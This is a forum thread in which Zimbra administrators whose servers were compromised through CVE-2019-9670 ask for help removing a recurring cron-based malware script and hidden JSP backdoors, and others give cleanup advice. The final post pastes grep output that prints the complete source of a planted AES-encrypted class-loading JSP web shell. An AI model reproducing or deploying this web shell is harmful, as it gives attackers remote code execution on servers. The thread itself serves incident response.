CVE-2019-9670 being actively exploited (Hacked Server)

[Stemond11]

Hi ng

My zimbra machine is compromised.
If i delete zmswatch script and zmswatch crontab after few hours the script returns .
How can i find the source malaware ?
How can i delete definitly the script?

Please help me. !!
Thanks Stefano

[tin]

Have a read over the whole thread.... I'll give a few thoughts here, but this is not everything...

You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.

I found uninstalling wget and curl stopped the scripts working to reinfect. This may give you a better chance to clean things up, but they may also use other tricks.

Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.

Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimvra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.

[maxxer]

Hi ng
How can i find the source malaware ?
How can i delete definitly the script?

read the whole thread and/or the blogpost linked here, you will find guidelines on how to cleanup your system

[Stemond11]

in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

In /tmp all request JSP like this every 30 seconds are in read-only:
WHY ??

<Configure class="org.eclipse.jetty.webapp.WebAppContext">
<Get name="securityHandler">
<Set name="loginService">
<New class="com.zimbra.cs.servlet.ZimbraLoginService">
<Set name="name">Zimbra</Set>
</New>
</Set>
<Set name="authenticatorFactory">
<New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
<Set name="urlPattern">//downloads/*</Set>
</New>
</Set>
</Get>
</Configure>

[maxxer]

in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so on

[Stemond11]

i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano

[elby]

in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so on

After:
===


What should I clean up?
how to figure out what are the unwanted jsp files?

Thanks,

[AB_Zimbra]

i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano

The infection creates new jsp's and edits existing ones with "control code". This way the attacker can remotely execute commands on your comprimised system. Patching after infection is not enough, you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).

Please read the blog on maxxer it's site, as he linked to at the start of this topic.

This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:

Code: Select all

grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd

[zimbraxtc]

Hello all!

I have the same issue on a 8.6 Ubuntu.

- added patch
- clean /var/spool/cron/crontabs/zimbra (line at the end)
- clean /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email-accounts (only one)
- changed the admin-pass for zimbra-user
- cant find any strange .jsp-files.
- clean /opt/zimbra/data/tmp/.zmswatch.xxx files

zmswatch still popping up...

after cleaning like above zmswatch started without zimbra-server running.

Any ideas or thoughts about this?

[mqaroush]

[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));

What this mean???